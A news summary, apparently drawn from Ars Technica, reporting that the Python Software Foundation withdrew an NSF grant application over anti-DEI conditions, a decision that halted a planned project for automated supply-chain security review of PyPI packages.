Trump admin anti-DEI rules block Python security upgrade
▼ Summary
– The Python Software Foundation withdrew its NSF grant application because it couldn’t agree to terms prohibiting any DEI programming, which contradicted its mission and values.
– The Carpentries previously withdrew a similar NSF proposal after their DEI content was flagged as non-compliant with NSF priorities regarding underrepresented student retention.
– Both organizations objected to the NSF’s May rule change prohibiting grant recipients from advancing diversity, equity, and inclusion in any programs, even those not funded by NSF.
– The withdrawn Python project would have developed automated security tools to proactively review PyPI packages and protect users from supply-chain attacks across multiple open-source ecosystems.
– The Python Software Foundation is now seeking alternative funding through donations to complete the security project that would benefit PyPI, NPM, and Crates.io users.
The Python Software Foundation recently made the difficult choice to withdraw a significant grant application from the National Science Foundation, a decision driven by new federal stipulations concerning diversity, equity, and inclusion (DEI) initiatives. After extensive consultations and a review of how other groups handled similar situations, the foundation’s board concluded it could not accept terms that would restrict its core mission. The foundation stated it explored every possible avenue to reconcile the grant’s requirements with its own deeply held principles but ultimately found the conditions untenable.
This situation mirrors an earlier case involving The Carpentries, an organization dedicated to teaching computational skills. In June, they also pulled a grant proposal after being notified it was flagged for DEI content. The specific issue cited was their focus on “the retention of underrepresented students,” which was deemed misaligned with the NSF’s updated priorities. A major concern for both organizations is a rule change from May that prohibits grant recipients from advancing or promoting DEI in any of their programs, not just those funded by the NSF. The Carpentries explained that accepting the funds would have forced them to discontinue all DEI-focused programming, a commitment they were unwilling to abandon.
For the Python Software Foundation, agreeing to a clause stating they would not operate any programs that “advance or promote” diversity, equity, and inclusion was simply not an option. The board viewed such an agreement as a direct betrayal of its mission and the community it serves, leading to a unanimous vote to withdraw the application. This decision comes with considerable disappointment, as the proposed project promised substantial security enhancements for the open-source ecosystem.
The now-defunct project was designed to protect millions of PyPI users from attempted supply-chain attacks. It aimed to develop new tools for the automated, proactive review of every package uploaded to the Python Package Index, moving beyond the current system that only reacts to problems. These innovative tools would have utilized capability analysis built upon a dataset of known malware. The potential impact extended far beyond Python; the resulting technology could have been adapted for other major open-source software registries like NPM and Crates.io, thereby improving security across multiple programming ecosystems.
Despite this setback, the Python Software Foundation remains committed to finding a way to complete this critical security work. The organization has concluded its public statement by issuing a call for support, encouraging both individual developers and corporate entities that rely on Python to consider making donations to help fund these vital security upgrades independently.
(Source: Ars Technica)
